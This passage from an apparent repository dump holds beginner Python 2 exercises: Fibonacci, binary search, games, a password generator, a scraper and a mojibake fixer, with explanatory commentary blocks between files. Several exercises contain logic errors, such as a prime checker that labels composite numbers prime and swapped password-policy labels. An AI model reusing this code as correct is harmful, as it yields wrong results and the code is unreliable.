"text": "# -*- coding: utf-8 -*-\n#!/usr/bin/env python2.7\n#\n#contributor for script\n#https://github.com/ttttian/python-latin1-to-utf8/blob/master/latin1_to_utf8.py\n#\nimport re\nimport sys\nimport os\n\nregexDict = {\n'€':'€','‚':'‚','„':'„','…':'…','‡':'‡',\n'‰':'‰','‹':'‹','‘':'‘','’':'’','“':'“',\n'•':'•','–':'–','—':'—','â„¢':'™','›':'›',\n'Æ’':'ƒ','ˆ':'ˆ','Å’':'Œ','Ž':'Ž','Ëœ':'˜','Å¡':'š',\n'Å“':'œ','ž':'ž','Ÿ':'Ÿ','¡':'¡','¢':'¢','£':'£',\n'¤':'¤','Â¥':'¥','¦':'¦','§':'§','¨':'¨','©':'©',\n'ª':'ª','«':'«','¬':'¬','Â' :'','®':'®','¯':'¯',\n'°':'°','±':'±','²':'²','³':'³','´':'´','µ':'µ',\n'¶':'¶','·':'·','¸':'¸','¹':'¹','º':'º','»':'»',\n'¼':'¼','½':'½','¾':'¾','¿':'¿','À':'À','Â':'Â',\n'Ã':'Ã','Ä':'Ä','Ã…':'Å','Æ':'Æ','Ç':'Ç','È':'È',\n'É':'É','Ê':'Ê','Ë':'Ë','ÃŒ':'Ì','ÃŽ':'Î','Ñ':'Ñ',\n'Ã’':'Ò','Ó':'Ó','Ô':'Ô','Õ':'Õ','Ö':'Ö','×':'×',\n'Ø':'Ø','Ù':'Ù','Ú':'Ú','Û':'Û','Ü':'Ü','Þ':'Þ',\n'ß':'ß','á':'á','â':'â','ã':'ã','ä':'ä','Ã¥':'å',\n'æ':'æ','ç':'ç','è':'è','é':'é','ê':'ê','ë':'ë',\n'ì':'ì','Ã' :'í','î':'î','ï':'ï','ð':'ð','ñ':'ñ',\n'ò':'ò','ó':'ó','ô':'ô','õ':'õ','ö':'ö','÷':'÷',\n'ø':'ø','ù':'ù','ú':'ú','û':'û','ü':'ü','ý':'ý',\n'þ':'þ','ÿ':'ÿ','Å' :'Š','Â' :'',\n}\n\nregex = r'€|‚|„|…|‡|‰|‹|‘|’|“|•|–|—|â„¢|›|Æ’|ˆ|Å’|Ž|Ëœ|\\\nÅ¡|Å“|ž|Ÿ|¡|¢|£|¤|Â¥|¦|§|¨|©|ª|«|¬|Â|®|¯|°|±|²|³|´|µ|¶|·|¸|¹|\\\nº|»|¼|½|¾|¿|À|Â|Ã|Ä|Ã…|Æ|Ç|È|É|Ê|Ë|ÃŒ|ÃŽ|Ñ|Ã’|Ó|Ô|Õ|Ö|×|Ø|Ù|Ú|\\\nÛ|Ü|Þ|ß|á|â|ã|ä|Ã¥|æ|ç|è|é|ê|ë|ì|Ã|î|ï|ð|ñ|ò|ó|ô|õ|ö|÷|ø|ù|ú|û|ü|ý|þ|ÿ|Å|Â'\n\ndef regexReplace(stringValue):\n newLine = stringValue\n match = re.findall(regex, newLine)\n if not match:\n return newLine\n for characterInvalid in match:\n newLine = re.sub(characterInvalid, regexDict[characterInvalid], newLine)\n return newLine\n\nif len(sys.argv) < 1:\n print(\"Informe o arquivo que será tratado como paramêtro!\")\n exit(1)\nelse:\n filePath = sys.argv[1]\n newFile = \"new_\" + str(filePath.split(\"/\")[-1])\n if os.path.exists(filePath):\n #open file\n file = open(sys.argv[1], \"r\")\n newFile = open(newFile, \"w\")\n for line in file.readlines():\n newFile.write(regexReplace(line))\n file.close()\n newFile.close()\n print(\"Foi gerado o arquivo %s!\" %newFile)\n else:\n print(\"Arquivo não existe!\")\n exit(2)\n"
}
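The mapping table in `utf8-debug.py` above enumerates UTF-8 byte sequences that were mis-decoded as Latin-1/CP1252 ("mojibake"). The same repair can often be expressed as a single encode/decode round trip instead of one regex substitution per character; a sketch of that idea, not the repo's code, and only valid for text that was double-decoded exactly once:

```python
def fix_mojibake(s):
    """Re-encode as CP1252 and decode as UTF-8 to undo a double decode."""
    try:
        return s.encode("cp1252").decode("utf-8")
    except (UnicodeEncodeError, UnicodeDecodeError):
        return s  # already clean, or not a simple double-decode

print(fix_mojibake("João é ótimo"))  # João é ótimo
```

CP1252 rather than Latin-1 matters here because the table above includes characters such as `€` that live in CP1252's 0x80-0x9F range.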
] | 1 |
vogd/pythontasks | https://github.com/vogd/pythontasks | 6a8512b33d566f538a6a1752f4ef0d44f51fe224 | 4e925df9abdfe98b1a44f1ca5a19bfee03edec8c | ec46971bb57702f0f60f85664fb0cde94bce0e3f | refs/heads/master | 2020-04-02T18:48:56.129800 | 2019-01-03T21:19:45 | 2019-01-03T21:19:45 | 154,713,952 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.568493127822876,
"alphanum_fraction": 0.6369863152503967,
"avg_line_length": 28,
"blob_id": "29f113edbc2c2bfc3e80b3a35bc26838c1882f71",
"content_id": "86aba9e5360eef08902e5cd4278c920438ed3aa2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 146,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 5,
"path": "/task13_02.py",
"repo_name": "vogd/pythontasks",
"src_encoding": "UTF-8",
"text": "num=int(raw_input(\"Enter amount of fibo items : \"))\nlist1=[1,1]\nfor i in range(1,(num-1)):\n list1.append(list1[i]+list1[i-1])\n print list1\n\n"
},
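An equivalent of the Fibonacci loop above written as a generator, which sidesteps the off-by-one bookkeeping around `num` (illustrative, Python 3 style rather than the repo's Python 2):

```python
from itertools import islice

def fib():
    """Yield Fibonacci numbers starting 1, 1, 2, 3, ..."""
    a, b = 1, 1
    while True:
        yield a
        a, b = b, a + b

num = 8
print(list(islice(fib(), num)))  # [1, 1, 2, 3, 5, 8, 13, 21]
```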
{
"alpha_fraction": 0.6539624929428101,
"alphanum_fraction": 0.6642467975616455,
"avg_line_length": 30.188678741455078,
"blob_id": "45e4c2f7c807701dcfdda18d43e6d3292cb7c805",
"content_id": "f8db757e239ace5a677f75d91f35f171f001010a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1653,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 53,
"path": "/task20.py",
"repo_name": "vogd/pythontasks",
"src_encoding": "UTF-8",
"text": "import random\nsortedl=[]\nmylist=[]\niteration=0\ni=17\nn=0 \ntrueval=0\n\ndef generatelist(iteration,i):\n iteration=iteration+1\n print (\"Iteration \" + str(iteration))\n mylist=random.sample(range(50),10)\n mylist == mylist.sort()\n print (mylist)\n checklistbinary(mylist,iteration,i)\n#checklist(mylist,iteration)\n\n#def checklist(mylist,iteration):\n# if (i in mylist):\n# print (\"Hurray \" + str(i) + \" is a part of the list ! \" + str(mylist))\n# raise SystemExit\n# else:\n# generatelist(iteration) \n\ndef checklistbinary(mylist,iteration,i):\n compare=len(mylist)\n compare = int(compare/2)\n for n in xrange(0,len(mylist)-1):\n print (\"Starting division from list itemID \"+str(compare))\n if int(mylist[compare])>i:\n print (\"ItemID \"+str(compare)+ \" is: \"+str(mylist[compare])+\" > \" + str(i))\n compare = compare-n\n #print(compare)\n trueval=1\n elif int(mylist[compare])==i:\n print (\"ItemID \" +str(compare)+\" is: \" + str(mylist[compare])+ \" = \" + str(i)) \n print (\"Item found in the list. Exiting..\")\n raise SystemExit\n elif int(mylist[compare])<i:\n #print(compare) \n print (\"Item \"+str(compare)+ \"is: \" +str(mylist[compare])+\" < \" + str(i))\n compare = compare+n\n print (\"Next List item index is \" +str(compare))\n compare = int(compare/2)\n trueval=0\n if trueval==1:\n print (\"Value is withing the list range, but there is no direct match\") \n print (\"Startig new interaction unless the list will have direct match\")\n generatelist(iteration,i)\n else:\n print (\"Value is not withing the list. Starting new iteration unless item will be found..\")\n generatelist(iteration,i)\ngeneratelist(iteration,i)\n"
},
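The `task20.py` entry above interleaves list regeneration with the search itself, which obscures the core idea. The binary-search loop stated on its own, assuming a sorted input list (illustrative, not the repo's code):

```python
def binary_search(items, target):
    """Return the index of target in the sorted list items, or -1."""
    lo, hi = 0, len(items) - 1
    while lo <= hi:
        mid = (lo + hi) // 2
        if items[mid] == target:
            return mid      # found a match
        if items[mid] < target:
            lo = mid + 1    # discard the lower half
        else:
            hi = mid - 1    # discard the upper half
    return -1               # not present

assert binary_search([2, 5, 17, 23, 41], 17) == 2
assert binary_search([2, 5, 17, 23, 41], 18) == -1
```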
{
"alpha_fraction": 0.5373134613037109,
"alphanum_fraction": 0.5717566013336182,
"avg_line_length": 31.148147583007812,
"blob_id": "a7cb350f5365007710cc9012bbabae7fea8133f0",
"content_id": "5f26a514ad6d50ba7afc45c743e319e1bc296bb6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 871,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 27,
"path": "/task8.py",
"repo_name": "vogd/pythontasks",
"src_encoding": "UTF-8",
"text": "import random\nflag = 1\nchoice = ['empty','rock','paper','scissors']\n\nwhile flag > 0:\n usr_command = raw_input(\"Hit Enter to Start Game\")\n \n usr_name1 = raw_input(\"Enter User1 name : \")\n m1 = int(raw_input(\" enter choice 1-rock, 2-paper, 3-scissors: \"))\n if m1 not in range (1,4):\n print(\"Error numeric values from 1 to 3 only\")\n else: \n \n usr_name2 = raw_input(\"Enter User2 name : \")\n m2 = int(raw_input(\" enter choice 1-rock, 2-paper, 3-scissors: \"))\n if m2 not in range (1,4):\n print(\"Enter numeric values from 1 to 3 only\")\n else: \n game = int(random.randint(1,3))\n print (game)\n if choice[m1] == choice[game]:\n print (\"Winner is User1 \" + choice[game])\n else:\n if choice[m2] == choice[game]:\n print (\"Winner is User2 \" + choice[game])\n else:\n print (\"its a draw..\") \n"
},
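`task8.py` above declares whichever player matches a random throw the "winner", which is not the usual rock-paper-scissors rule. The standard pairwise rule fits in one mapping (an illustrative sketch, not the repo's logic):

```python
BEATS = {"rock": "scissors", "paper": "rock", "scissors": "paper"}

def rps_winner(move1, move2):
    """Decide a round of rock-paper-scissors between two named moves."""
    if move1 == move2:
        return "draw"
    return "player1" if BEATS[move1] == move2 else "player2"

assert rps_winner("rock", "scissors") == "player1"
assert rps_winner("rock", "paper") == "player2"
assert rps_winner("paper", "paper") == "draw"
```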
{
"alpha_fraction": 0.5986914038658142,
"alphanum_fraction": 0.6532170176506042,
"avg_line_length": 19.377777099609375,
"blob_id": "c31438c3f0fc9f575672f9ee9772c5e47f751e31",
"content_id": "f9989cdd252dd9623a2386662035f4a7f2acdaf2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 917,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 45,
"path": "/task26.py",
"repo_name": "vogd/pythontasks",
"src_encoding": "UTF-8",
"text": "#import random\nfrom random import randrange\nn=0\nlist1=[]\nlist2=[]\nlist3=[]\n\n\ndef generatelist(listname):\n n=0\n while n<=2:\n listname.append(randrange(0,3))\n n+=1\n print listname\n\ndef main():\n list1=[]\n list2=[]\n list3=[]\n generatelist(list1)\n generatelist(list2)\n generatelist(list3)\n checkwinner(list1,list2,list3)\n\ndef checkwinner(list1,list2,list3): \n print \"\"\n n=0 \n while n <=2:\n# print \"list1 item \"+str(n) + \" = \"+str(list1[n])\n# print \"list2 item \"+str(n) + \" = \"+str(list2[n])\n# print \"list3 item \"+str(n) + \" = \"+str(list3[n])\n if list1[n]==list2[n] and list2[n]==list3[n]:\n print \"player won by horizontal\" \n raise SystemExit\n n+=1 \n if list1[0]==list2[1] and list2[1]==list3[2]:\n print \"player won by diagonal from left to right\"\n raise SystemExit\n if list3[0]==list2[1] and list2[1]==list1[2]:\n print \"player won by diagonal from right to left\"\n raise SystemExit\n else:\n main() \n\nmain()\n"
},
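`task26.py` above only tests the three rows and the two diagonals of its 3x3 grid, never the columns. A complete line check for a board given as three row lists, as in the entry; a sketch rather than the repo's code, and like the original it treats any three equal cells (including zeros) as a line:

```python
def winning_line(board):
    """True if any row, column, or diagonal of a 3x3 board holds equal cells."""
    lines = list(board)                                           # 3 rows
    lines += [[board[r][c] for r in range(3)] for c in range(3)]  # 3 columns
    lines.append([board[i][i] for i in range(3)])                 # main diagonal
    lines.append([board[i][2 - i] for i in range(3)])             # anti-diagonal
    return any(line[0] == line[1] == line[2] for line in lines)

assert winning_line([[1, 1, 1], [0, 2, 0], [2, 0, 2]])      # top row
assert winning_line([[1, 0, 2], [0, 1, 2], [2, 0, 1]])      # main diagonal
assert not winning_line([[0, 1, 2], [2, 0, 1], [1, 0, 2]])  # no line anywhere
```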
{
"alpha_fraction": 0.6574172973632812,
"alphanum_fraction": 0.6905016303062439,
"avg_line_length": 26.5,
"blob_id": "d7801b066f5e14f900e46fddf8f64b7de371623c",
"content_id": "bb4a8e4e40dd38036af4ee844649377d9a12a1f4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 937,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 34,
"path": "/task1.py",
"repo_name": "vogd/pythontasks",
"src_encoding": "UTF-8",
"text": "\"\"\"TODO(ogolovatyi): DO NOT SUBMIT without one-line documentation for task1.\nMy task from https://www.practicepython.org/exercise/2014/01/29/01-character-input.html\nTODO(ogolovatyi): DO NOT SUBMIT without a detailed description of task1.\n\"\"\"\n\n#from __future__ import absolute_import\n#from __future__ import division\n#from __future__ import print_function\n\n#from absl import app\n#from absl import flags\n\n#tLAGS = flags.FLAGS\n\n\n#def main(argv):\n# if len(argv) > 1:\n# raise app.UsageError('Too many command-line arguments.')\n\n#if __name__ == '__main__':\n# app.run(main)\n\nname = raw_input(\"What is your Name: \")\nprint (\"your name is:\" +name)\nage = int(raw_input(\"Enter your age: \"))\nif age <100:\n age100 = int(100-age)\n print (\"you will reach 100 in \" +str(age100)+\" years.\")\nelse:\n print (\"Your age is already >100 years\")\n\nrepeat=int(raw_input(\"repeats number: \"))\nfor i in range(repeat):\n print (\"this is repeat number\"+str(i))\n\n\n"
},
{
"alpha_fraction": 0.6196581125259399,
"alphanum_fraction": 0.6410256624221802,
"avg_line_length": 16.923076629638672,
"blob_id": "0aabea03abfc674ab6ae98dc1a40965f5a7270fe",
"content_id": "6e47c819117e3b7862a9e75cb11d692a3f69f216",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 234,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 13,
"path": "/task11_02.py",
"repo_name": "vogd/pythontasks",
"src_encoding": "UTF-8",
"text": "def checkdigit(f):\n list1=range(2,f)\n print list1\n for i in list1:\n if f%i==0: \n return f\n\nd=int(raw_input(\"Enter digit :\"))\nresult=checkdigit(d)\nif result:\n print str(result)+\"-Is a Prime !!! \"\nelse:\n print str(d)+\"-Not a prime\"\n\n"
},
{
"alpha_fraction": 0.4589800536632538,
"alphanum_fraction": 0.521064281463623,
"avg_line_length": 21.049999237060547,
"blob_id": "bea6bf5f798a9211667b83c52d132178cb4518bd",
"content_id": "95cc193ad14b84ac4372aae4d1f82c79e7210cc9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 451,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 20,
"path": "/task3.py",
"repo_name": "vogd/pythontasks",
"src_encoding": "UTF-8",
"text": "list = [1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89]\nlist2 = []\nnum=int(raw_input(\"Enter any number :\"))\nfor x in list:\n if x < num:\n print (int(x))\n if x < 5:\n # print (\"x = \"+str(x)+\" which is less than 5\")\n list2.append(x) \n\nfor y in list2:\n print (str(y)+ \" list of items less than 5\")\n\n#squares = [1, 4, 9, 16]\n#sum = 0\n#for num in squares:\n# sum +=num\n#print sum\nfor item in reversed(list):\n print [item]\n \n\n\n\n"
},
{
"alpha_fraction": 0.5511627793312073,
"alphanum_fraction": 0.5930232405662537,
"avg_line_length": 24.294116973876953,
"blob_id": "c0d69fdde0bd3c9cd29a59e014e3826971b97e0c",
"content_id": "4f6f58895b4cf5ebce9d3a8d4cbe3c9431202d47",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 430,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 17,
"path": "/task5.py",
"repo_name": "vogd/pythontasks",
"src_encoding": "UTF-8",
"text": "import random\ncount1 = int(random.randint(4,8))\ncount2 = int(random.randint(4,8))\nprint (\"list1 length :\" +str(count1))\nprint (\"list2 length :\"+str(count2))\na=random.sample(range(1,10),int(count1))\nb=random.sample(range(1,10),int(count2))\n\nc=[]\nprint (str(a))+(str(b))\nfor x in a:\n if x in b:\n if x in c:\n print (\"Item \" + str(x)+ \" already in list. Skipping\")\n else: \n c.append(x)\nprint (c)\n"
},
{
"alpha_fraction": 0.6310782432556152,
"alphanum_fraction": 0.641649067401886,
"avg_line_length": 23.256410598754883,
"blob_id": "b5935a880df1db66aca6dcf98e151979558f9fe7",
"content_id": "ea93a9b05544faf0599a86942236d5185c7344d3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 946,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 39,
"path": "/task16.py",
"repo_name": "vogd/pythontasks",
"src_encoding": "UTF-8",
"text": "import string\nimport random\npolicy =\"\"\nsymbols=[]\n\ndef inputpolicy(policy):\n policy=int(raw_input (\"Enter 1 for strong password policy, 2 for weak policy : \"))\n checkvalue(policy,symbols) \n\ndef checkvalue(policy,symbols):\n if policy == 1: \n symbols=[]\n print (\"Weak password policy selected\")\n elif policy == 2:\n symbols=[\"@\",\"%\",\"&\",\"(\",\")\",\"#\",\"*\",\"^\",\"~\",\"+\"]\n print (\"Strong password policy selected\")\n else:\n print \"entered value must be 1 or 2\"\n inputpolicy(policy)\n#print str(symbols)\n\ninputpolicy(policy)\n\n\ndictionary=string.ascii_letters + string.digits + str(symbols)\n\nfrom os import urandom\n#chars = \"\".join([random.choice(string.letters) for i in xrange(15)])\nchars = \"\".join([random.choice(dictionary)for i in xrange(15)])\n\n#print (\" initial chars\", chars)\na=list(chars)\nfor i in a:\n if i == \"'\" or i == '\"' or i == \",\":\n# print \"will remove this : \" + str(i) \n a.remove(i)\n# print \"removed\"\n\nprint ''.join(a)\n"
},
{
"alpha_fraction": 0.6372881531715393,
"alphanum_fraction": 0.6474575996398926,
"avg_line_length": 16.294116973876953,
"blob_id": "f46dabf8b0c220ab44cdde0ea00cc165d2209738",
"content_id": "2c3c9823bb5b583199c801eb32226dd7fd2f79c8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 295,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 17,
"path": "/task15.py",
"repo_name": "vogd/pythontasks",
"src_encoding": "UTF-8",
"text": "x=raw_input(str(\"enter words : \"))\nword_list =x.split (' ')\ni=0\n\ndef split_string(string):\n letters=list(string)\n letters.reverse()\n print letters\n\ndef reverse(list_a,i):\n while i <= len(list_a)-1: \n i=i+1\n string=list_a[-i]\n print string \n split_string(string) \n\nreverse(word_list,i)\n\n"
},
{
"alpha_fraction": 0.6164383292198181,
"alphanum_fraction": 0.6392694115638733,
"avg_line_length": 18.909090042114258,
"blob_id": "157d109cddef77bfa12a1eedbe504aa641693a9d",
"content_id": "1553bb4670794d3d724c1dd0351fa141b672b1e5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 219,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 11,
"path": "/task13.py",
"repo_name": "vogd/pythontasks",
"src_encoding": "UTF-8",
"text": "import random\nx=int(raw_input(\"How many fibonacci digits to store :\"))\nlist_d =[1,1]\n\ndef append(list_d,x):\n while len(list_d)<=x-1: \n d=int(list_d[-1]+list_d[-2])\n list_d.append(d)\n\nappend(list_d,x)\nprint (list_d)\n"
},
{
"alpha_fraction": 0.6570680737495422,
"alphanum_fraction": 0.6662303805351257,
"avg_line_length": 19.648649215698242,
"blob_id": "790aa6ec505bfb3a26d28a645d2e245f41f4fbb2",
"content_id": "331b3b15645aa0d7ea4396d341a8821bed39d138",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 764,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 37,
"path": "/task21.py",
"repo_name": "vogd/pythontasks",
"src_encoding": "UTF-8",
"text": "import re\nimport requests\nimport subprocess\nimport os\nfrom bs4 import BeautifulSoup\nx=''\nitem=''\n\ndef inputname():\n x= str(raw_input(\"Enter filename to save : \"))\n x = os.getcwd()+\"/\"+x\n #print(x)\n download(x)\n\ndef striphtml(x,data):\n p = re.compile(r'<.*?>')\n text=p.sub('', data)\n writef(x,text)\n\ndef writef(filename, data):\n #print(filename) \n f = open(filename,'a')\n f.write(data)\n f.close\n\n\ndef download(x):\n base_url = 'https://www.vanityfair.com/style/society/2014/06/monica-lewinsky-humiliation-culture'\n r = requests.get(base_url)\n soup = BeautifulSoup(r.text,\"lxml\")\n for story_text in soup.findAll(['data-reactid=','p']):\n story_text=str(story_text)\n item==striphtml(x,story_text)\n #print (item)\n writef(x,str(item) + \"\\n\") \n\ninputname()\n"
},
{
"alpha_fraction": 0.692923903465271,
"alphanum_fraction": 0.6995994448661804,
"avg_line_length": 25.75,
"blob_id": "3f8305d05b0e9bb342761f8133026d323b3b8ab5",
"content_id": "1518416cbc064b5f9b5b2ce553be151ac60a4a50",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 749,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 28,
"path": "/task30.py",
"repo_name": "vogd/pythontasks",
"src_encoding": "UTF-8",
"text": "# Download file and read random word from it\n#import os\n#os.system (\"wget -Nnc http://norvig.com/ngrams/sowpods.txt\")\n\ncounter=0\nuplimit=0\nimport os\nimport sys\nimport urllib\n\nurllib.urlretrieve(\"http://norvig.com/ngrams/sowpods.txt\", os.getcwd()+\"/sowpods.txt\")\n#print os.getcwd()\n#limit=int(os.popen(\"wc -l sowpods.txt | awk -F' ' '{print$1}'\").read())\n#print limit\n#sys.exit()\n\nwith open('sowpods.txt','r') as f:\n line=f.readline()\n while line:\n counter=int(counter+1) \n line=f.readline()\n print \"Total lines in file : \"+ str(counter)\n from random import *\n linetoread=randint(1,int(counter))\n print \"Need to print line number : \"+str(linetoread)\n line=open('sowpods.txt','r').readlines()[linetoread]\n print line\nprint \"All lines are read\"\n"
},
{
"alpha_fraction": 0.614689290523529,
"alphanum_fraction": 0.6316384077072144,
"avg_line_length": 20.071428298950195,
"blob_id": "f6599ef23c99018ad3ee50686b433bf9b576cfd3",
"content_id": "c6be7875ce6610a4e708a833bdff5ca03bcc6a54",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 885,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 42,
"path": "/task18.py",
"repo_name": "vogd/pythontasks",
"src_encoding": "UTF-8",
"text": "import random\n\ndef generatedigit():\n x= random.randint(0,9999)\n print x\n get_integer (\"Guess a 4 digit number \",x,cows,bulls)\n\ny=\"\"\ncows = 0\nbulls = 0\ninputl=[]\n\ndef get_integer(text,x,cows,bulls):\n while True:\n try:\n y=int(raw_input(text))\n inputl = list(str(y))\n if len(inputl)<4:\n print (\"Please, Enter 4 digit value\")\n elif len(inputl)>4:\n print (\"Please, Enter a 4 digit value\") \n # print (\"Y is \"+str(y))\n else:\n cowscheck(y,x,cows,bulls)\n except ValueError:\n print \"Oops! That was no valid number. Try again...\"\n\ndef cowscheck(y,x,cows,bulls):\n #print x\n #print y\n if x == y:\n cows = cows+1\n print (\"You guessed!!!!\")\n print (\"You have \"+str(cows)+\" cows.\")\n raise SystemExit\n else:\n bulls=bulls+1\n print (\"Boo\")\n print (\"You have \" + str(bulls) + \" bulls.\")\n get_integer(\"Guess a 4 digit number one more time :\",x,cows,bulls)\n\ngeneratedigit()\n"
},
{
"alpha_fraction": 0.5634328126907349,
"alphanum_fraction": 0.5932835936546326,
"avg_line_length": 13.833333015441895,
"blob_id": "69f2b3197181b57b60f2290caadeef27a9b04d74",
"content_id": "b5452016860424e96e8c25383786bf9fbc77c5ee",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 268,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 18,
"path": "/task14.py",
"repo_name": "vogd/pythontasks",
"src_encoding": "UTF-8",
"text": "import random\n\na=random.sample(range(15),10)\nb=random.sample(range(15),10)\n \nprint a\nprint b\n\ndef remover(a,b):\n [b.remove(i) for i in b if i in a] \n [a.remove(z) for z in a if z in b]\n c=a+b\n printer(c)\n \ndef printer(x):\n print x\n \nremover(a,b)\n\n"
},
{
"alpha_fraction": 0.5918300747871399,
"alphanum_fraction": 0.6290849447250366,
"avg_line_length": 22.720930099487305,
"blob_id": "9d53ebe8bd3d29687eea1a6ab64d19e7ff118d03",
"content_id": "307dd4b7233a28cff0de9559087078345db4a1da",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3060,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 129,
"path": "/task27_1.py",
"repo_name": "vogd/pythontasks",
"src_encoding": "UTF-8",
"text": "from random import randrange\n\nn=0\nk=0\nsymbol=0\ncoord=''\ncoordlist=[]\nlist1=[]\nlist2=[]\nlist3=[]\nwinner=0\n\ndef generatelist(listname):\n n=0\n while n<=2:\n listname.append(\"\")\n n+=1\n print listname\n\nplayer1=1\nplayer2=0\n\ndef checkmoves(list1,list2,list3):\n # Match lists and find if same position items in lists are the same (check by vertical)\n global k\n for k in list1:\n if k <> '':\n if k==0:\n winner=1 \n else: \n winner=2\n if k in list2 and k in list3:\n print \"Winner is player \"+ str(winner)+ \" !!!\"\n raise SystemExit\n\n# Check winner if All items in list1 are filled with values \n if len(set(list1))==1: \n print \"Winner is player \"+ str(winner)+ \" !!!\"\n raise SystemExit\n\n# Check winner if All items in list2 are filled with values\n for k in list2:\n if k <> '':\n if k==0:\n winner=1 \n else: \n winner=2\n if len(set(list2))==1: \n print \"Winner is player \"+ str(winner)+ \" !!!\"\n raise SystemExit\n\n# Check winner if All items in list3 are filled with values\n for k in list3: \n if k <> '':\n if k==0:\n winner=1 \n else: \n winner=2\n if len(set(list3))==1: \n print \"Winner is player \"+ str(winner)+ \" !!!\"\n raise SystemExit\n\n#Check winner by diagonal\n if list1[0]<>''and list2[1]<>'' and list3[2]<>'':\n if str(list1[0])==str(list2[1]) and str(list2[1])==str(list3[2]):\n if str(list1[0])=='1':\n print \"Winner is player2 !!!\"\n else:\n print \"Winner is player1 !!!\"\n if list3[0]<>'' and list2[1]<>'' and list1[2]<>'': \n if str(list3[0])==str(list2[1]) and str(list2[1])==str(list1[2]):\n if str(list3[0])=='1':\n print \"Winner is player2 !!!\"\n else:\n print \"Winner is player1 !!!\" \n \ndef readmove(player):\n coord=raw_input(\"Input player \"+str(player)+\" move coordinates x,y : \")\n coordlist=list(coord) \n x=(int(coordlist[0])-1)\n y=int(coordlist[2])\n if int(x)<0 or int(y)==0:\n print \"Please enter new coordinates for the move. Axis value can not be '0'\"\n readmove(player)\n else: \n if int(player)==1:\n symbol=0\n print \"Will call func to update list with '0'\"\n print \"symbol: \"+str(symbol)\n placemove(symbol,x,y,player)\n else:\n symbol=1\n print \"Will call func to update list with '1'\"\n print \"symbol: \"+str(symbol)\n placemove(symbol,x,y,player)\n\n\ndef listappend(symbol,listname,x,player):\n if listname[int(x)]<>0 and listname[int(x)]<>1:\n print \"appending \"+str(listname)\n listname[int(x)]=int(symbol)\n else:\n print \"please enter new coordinates, that slot is already used\"\n readmove(player)\n\ndef placemove(symbol,x,y,player):\n if int(y)==1:\n listappend(symbol,list1,x,player)\n elif int(y)==2:\n listappend(symbol,list2,x,player)\n elif int(y)==3:\n listappend(symbol,list3,x,player)\n else:\n print \"Enter Valid X cordinates from 1 to 3 one more time !!! : \"\n readmove(player)\n\n print list1\n print list2\n print list3\n\ngeneratelist(list1)\ngeneratelist(list2)\ngeneratelist(list3)\n\nwhile n<=3:\n readmove(1)\n checkmoves(list1,list2,list3)\n readmove(2)\n checkmoves(list1,list2,list3)\n"
},
{
"alpha_fraction": 0.6979166865348816,
"alphanum_fraction": 0.7063491940498352,
"avg_line_length": 41.8510627746582,
"blob_id": "6ce183acf5d385de1b54ec08d842d04984010b2c",
"content_id": "bd8d85b7c0b0c88e96db1346e6e473bbc803d6e5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2016,
"license_type": "no_license",
"max_line_length": 176,
"num_lines": 47,
"path": "/task25.py",
"repo_name": "vogd/pythontasks",
"src_encoding": "UTF-8",
"text": "import random\n\nguessedlist=[50]\n\nflag=0 \n\ndef generatenum(guessed,guessednew,guessedlist):\n n= int(len(guessedlist)-1) # because n> than actual item numbers since index starts from 0\n if int(guessed) < int(guessednew):\n print str(guessed)+\" < \"+ str(guessedlist[n-1]) \n print \"range to generate from \"+str(guessed)+\" to \"+str(guessednew)\n guessed =random.randrange(guessed,guessednew)\n else :\n print str(guessed)+ \" > \"+ str(guessednew)\n # if the next guessed < than your num\n print \"range to generate from \"+str(guessednew)+\" to \"+str(guessed)\n guessed =random.randrange(guessednew,guessed)\n print (\"Guessed generated \"+str(guessed))\n guessnum (\"Enter 'o' if guessed 'y' if the number is bigger than your guessed and 'n' if not: \",guessed)\ndef guessnum(text,guessed):\n global flag\n print guessed\n confirmation = str(raw_input(text))\n flag==0\n while (flag==0):\n if confirmation ==\"o\":\n print (\"Congrats! You have guessed the number !!!!\")\n guessedlist.append(guessed)\n print (\"We have used \" + str(len(guessedlist))+ \" attempts to guess your number.\")\n flag==1\n raise SystemExit\n elif confirmation==\"y\":\n guessedlist.append(guessed)\n guessednew=abs(guessed-(guessed/2))\n print \"next number range is up to 